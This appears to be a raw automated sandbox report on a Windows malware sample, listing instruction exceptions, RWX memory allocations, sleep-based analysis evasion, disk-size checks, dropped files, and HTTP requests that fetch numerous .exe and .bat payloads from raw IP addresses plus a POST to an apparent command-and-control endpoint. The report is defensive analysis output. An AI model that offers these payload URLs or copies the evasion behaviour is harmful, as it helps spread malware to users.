registers.edx: 611634223
registers.ebx: 205545
registers.esi: 21946311
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 29 c9 ff 34 0a e9 4f fe ff ff 8b 14 24 52 54
exception.symbol: 2w7420+0x201680
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2102912
exception.address: 0x14f1680
registers.esp: 4062844
registers.edi: 262633
registers.eax: 27385
registers.ebp: 4010274836
registers.edx: 21986164
registers.ebx: 205545
registers.esi: 21946311
registers.ecx: 666380577
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 bb 74 b0 df 79 52 ba b2 aa fa 6f f7 da e9
exception.symbol: 2w7420+0x2016dd
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2103005
exception.address: 0x14f16dd
registers.esp: 4062844
registers.edi: 262633
registers.eax: 27385
registers.ebp: 4010274836
registers.edx: 21986164
registers.ebx: 205545
registers.esi: 1984793192
registers.ecx: 4294942432
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 29 f6 ff 34 1e ff 34 24 ff 34 24 ff 34 24 e9
exception.symbol: 2w7420+0x21080b
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2164747
exception.address: 0x150080b
registers.esp: 4062844
registers.edi: 2908575910
registers.eax: 26303
registers.ebp: 4010274836
registers.edx: 1149356700
registers.ebx: 22046850
registers.esi: 734438733
registers.ecx: 2152578265
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 81 ec 04 00 00 00 89 24 24 81 04 24 04 00
exception.symbol: 2w7420+0x2103d5
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2163669
exception.address: 0x15003d5
registers.esp: 4062844
registers.edi: 2908575910
registers.eax: 26303
registers.ebp: 4010274836
registers.edx: 116969
registers.ebx: 22046850
registers.esi: 4294943544
registers.ecx: 2152578265
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 68 4d 85 e5 2f 5e e9 7e 02 00 00 29 c2 58
exception.symbol: 2w7420+0x225822
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2250786
exception.address: 0x1515822
registers.esp: 4062808
registers.edi: 2130516531
registers.eax: 26593
registers.ebp: 4010274836
registers.edx: 2130566132
registers.ebx: 22106547
registers.esi: 22102424
registers.ecx: 1308426240
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 e9 27 fd ff ff 5a f7 d8 c1 e0 07 57 bf b6
exception.symbol: 2w7420+0x22563c
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2250300
exception.address: 0x151563c
registers.esp: 4062812
registers.edi: 2130516531
registers.eax: 26593
registers.ebp: 4010274836
registers.edx: 2130566132
registers.ebx: 22133140
registers.esi: 22102424
registers.ecx: 1308426240
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 2d 00 00 00 56 be a7 e6 fe 27 53 bb b2 e9
exception.symbol: 2w7420+0x225a59
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2251353
exception.address: 0x1515a59
registers.esp: 4062812
registers.edi: 452704
registers.eax: 26593
registers.ebp: 4010274836
registers.edx: 2130566132
registers.ebx: 22109644
registers.esi: 0
registers.ecx: 1308426240
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 00 00 00 00 68 47 73 7c 04 89 2c 24 e9 4a
exception.symbol: 2w7420+0x227c21
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2260001
exception.address: 0x1517c21
registers.esp: 4062808
registers.edi: 22116331
registers.eax: 30993
registers.ebp: 4010274836
registers.edx: 1619599480
registers.ebx: 1610776832
registers.esi: 27352579
registers.ecx: 1641713947
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 e9 77 05 00 00 81 ce b4 fa bf 67 81 f6 b0
exception.symbol: 2w7420+0x227915
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2259221
exception.address: 0x1517915
registers.esp: 4062812
registers.edi: 22147324
registers.eax: 30993
registers.ebp: 4010274836
registers.edx: 4294938892
registers.ebx: 1610776832
registers.esi: 27352579
registers.ecx: 360407912
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 68 1b 47 f6 7b 8b 04 24 e9 46 00 00 00 68
exception.symbol: 2w7420+0x2284c6
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2262214
exception.address: 0x15184c6
registers.esp: 4062812
registers.edi: 4294941084
registers.eax: 1653410144
registers.ebp: 4010274836
registers.edx: 1599218055
registers.ebx: 22148172
registers.esi: 27352579
registers.ecx: 1692676579
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 c7 04 24 9c 92 69 35 89 0c 24 b9 22 cf d2
exception.symbol: 2w7420+0x22f538
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2291000
exception.address: 0x151f538
registers.esp: 4062808
registers.edi: 22145400
registers.eax: 26424
registers.ebp: 4010274836
registers.edx: 0
registers.ebx: 4294966172
registers.esi: 5233039
registers.ecx: 22143504
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 89 0c 24 b9 19 52 3f 77 89 cb e9 26 fc ff
exception.symbol: 2w7420+0x22f4ff
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2290943
exception.address: 0x151f4ff
registers.esp: 4062812
registers.edi: 22148692
registers.eax: 26424
registers.ebp: 4010274836
registers.edx: 0
registers.ebx: 0
registers.esi: 9103698
registers.ecx: 22143504
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 e9 00 00 00 00 81 ec 04 00 00 00 89 3c 24
exception.symbol: 2w7420+0x23002f
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2293807
exception.address: 0x152002f
registers.esp: 4062812
registers.edi: 22148692
registers.eax: 32258
registers.ebp: 4010274836
registers.edx: 71145
registers.ebx: 4294937880
registers.esi: 9103698
registers.ecx: 22181330
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 89 e6 53 bb e6 70 df 7f 81 f3 38 0b e5 7f
exception.symbol: 2w7420+0x232aa1
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2304673
exception.address: 0x1522aa1
registers.esp: 4062812
registers.edi: 604292944
registers.eax: 4294939036
registers.ebp: 4010274836
registers.edx: 22190652
registers.ebx: 211131136
registers.esi: 9103698
registers.ecx: 22181330
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 e9 6d 03 00 00 8b 1c 24 57 e9 c6 ff
exception.symbol: 2w7420+0x23640d
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2319373
exception.address: 0x152640d
registers.esp: 4062812
registers.edi: 22178877
registers.eax: 27919
registers.ebp: 4010274836
registers.edx: 849461110
registers.ebx: 0
registers.esi: 44338258
registers.ecx: 81129
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 44 02 00 00 59 e9 a8 02 00 00 01 f8 e9 e3
exception.symbol: 2w7420+0x23c68f
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2344591
exception.address: 0x152c68f
registers.esp: 4062808
registers.edi: 22178877
registers.eax: 31556
registers.ebp: 4010274836
registers.edx: 2130566132
registers.ebx: 2147483650
registers.esi: 22182236
registers.ecx: 22201831
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 c7 04 24 aa 02 db 3b 89 14 24 56 50 b8 7f
exception.symbol: 2w7420+0x23cbc7
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2345927
exception.address: 0x152cbc7
registers.esp: 4062812
registers.edi: 22178877
registers.eax: 31556
registers.ebp: 4010274836
registers.edx: 2130566132
registers.ebx: 2147483650
registers.esi: 22182236
registers.ecx: 22233387
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 e9 ef fb ff ff 33 3c 24 e9
exception.symbol: 2w7420+0x23cd3d
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2346301
exception.address: 0x152cd3d
registers.esp: 4062812
registers.edi: 3457329000
registers.eax: 0
registers.ebp: 4010274836
registers.edx: 2130566132
registers.ebx: 2147483650
registers.esi: 22182236
registers.ecx: 22204887
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 29 c0 ff 34 10 ff 34 24 ff 34 24 8b 1c 24 e9
exception.symbol: 2w7420+0x24f6d1
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2422481
exception.address: 0x153f6d1
registers.esp: 4062812
registers.edi: 22256008
registers.eax: 26375
registers.ebp: 4010274836
registers.edx: 22304469
registers.ebx: 1969225702
registers.esi: 22231526
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 89 14 24 e9 22 01 00 00 5f 01 c1 58
exception.symbol: 2w7420+0x24f0d0
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2420944
exception.address: 0x153f0d0
registers.esp: 4062812
registers.edi: 22256008
registers.eax: 4294943400
registers.ebp: 4010274836
registers.edx: 22304469
registers.ebx: 1340866664
registers.esi: 22231526
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 89 04 24 c7 04 24 7f 4b fd 6e 81 34
exception.symbol: 2w7420+0x25a073
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2465907
exception.address: 0x154a073
registers.esp: 4062812
registers.edi: 22353185
registers.eax: 32297
registers.ebp: 4010274836
registers.edx: 2219384
registers.ebx: 22282050
registers.esi: 61718508
registers.ecx: 1308426240
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 89 e1 81 c1 04 00 00 00 81 e9 04 00 00 00
exception.symbol: 2w7420+0x2598b0
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2463920
exception.address: 0x15498b0
registers.esp: 4062812
registers.edi: 22323417
registers.eax: 32297
registers.ebp: 4010274836
registers.edx: 0
registers.ebx: 22282050
registers.esi: 605849937
registers.ecx: 1308426240
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 cc 15 2f 2b 89 0c 24 e9 c3 fa ff ff f7 de
exception.symbol: 2w7420+0x261b50
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2497360
exception.address: 0x1551b50
registers.esp: 4062808
registers.edi: 22323417
registers.eax: 30947
registers.ebp: 4010274836
registers.edx: 2130566132
registers.ebx: 842529331
registers.esi: 22352475
registers.ecx: 1308426240
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 e9 bb 00 00 00 89 de 5b 5d 89 f0 5e 68 f6
exception.symbol: 2w7420+0x2616a3
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2496163
exception.address: 0x15516a3
registers.esp: 4062812
registers.edi: 22323417
registers.eax: 30947
registers.ebp: 4010274836
registers.edx: 2130566132
registers.ebx: 842529331
registers.esi: 22383422
registers.ecx: 1308426240
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 55 4f 5f 14 89 34 24 52 89 34 24 89 0c 24
exception.symbol: 2w7420+0x2613a1
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2495393
exception.address: 0x15513a1
registers.esp: 4062812
registers.edi: 22323417
registers.eax: 4294939388
registers.ebp: 4010274836
registers.edx: 605325648
registers.ebx: 842529331
registers.esi: 22383422
registers.ecx: 1308426240
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 0e f8 ff ff 31 f9 5f 53 e9 e1 f7 ff ff be
exception.symbol: 2w7420+0x26fc37
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2554935
exception.address: 0x155fc37
registers.esp: 4062808
registers.edi: 2001
registers.eax: 29728
registers.ebp: 4010274836
registers.edx: 8
registers.ebx: 22380674
registers.esi: 22410205
registers.ecx: 9
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.215.113.59/Dy5h4kus/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/7709196889/hvof1h0.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/ebash/random.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/7453936223/LAc2heq.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/6336929412/Hmcm0Oj.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/6691015685/xztOH3r.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/5804781818/eZp5zCz.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/7881515133/690BRuM.bat
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/6629342726/i5Kz53x.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/5561582465/235T1TS.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.41/files/6350437481/lBiQciH.exe
request POST http://185.215.113.59/Dy5h4kus/index.php
request GET http://185.215.113.41/files/7709196889/hvof1h0.exe
request GET http://185.215.113.41/files/ebash/random.exe
request GET http://185.215.113.41/files/7453936223/LAc2heq.exe
request GET http://185.215.113.41/files/6336929412/Hmcm0Oj.exe
request GET http://185.215.113.41/files/6691015685/xztOH3r.exe
request GET http://185.215.113.41/files/5804781818/eZp5zCz.exe
request GET http://185.215.113.41/files/7881515133/690BRuM.bat
request GET http://185.215.113.41/files/6629342726/i5Kz53x.exe
request GET http://185.215.113.41/files/5561582465/235T1TS.exe
request GET http://185.215.113.41/files/6350437481/lBiQciH.exe
request POST http://185.215.113.59/Dy5h4kus/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 884
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 884
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2076
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73dc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2076
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d91000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2076
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d21000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00fc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2076
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2076
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004d30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2296
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7793f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2296
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x778b0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2296
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 180224
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x012f1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x042f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04300000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04310000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04430000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04540000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04550000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x731e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fa1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76d71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74fc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76971000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2836
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e51000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fa1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76d71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x731e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e51000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x1008f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72cf1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ce1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72cc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x748a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7793f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x778b0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75ab1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73181000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 413696
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00401000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3024
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3024
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3024
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3024
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3024
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description 7cde3a8044.exe tried to sleep 503 seconds, actually delayed analysis time by 503 seconds
description namez.exe tried to sleep 143 seconds, actually delayed analysis time by 143 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 2425184
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425184
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x000001ec
output_buffer: 
1 1 0

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x000001ec
output_buffer: 
1 1 0

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x000001ec
output_buffer: 
1 1 0

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x000001ec
output_buffer: 
1 1 0
file C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe
file C:\Windows\Temp\{3C00F4D4-05FB-4560-8F0E-1E24C5F0A8D1}\.cr\hvof1h0.exe
file C:\Users\test22\AppData\Local\Temp\10076120101\eZp5zCz.exe
file C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\StlpMt45.dll
file C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\Entropy.dll
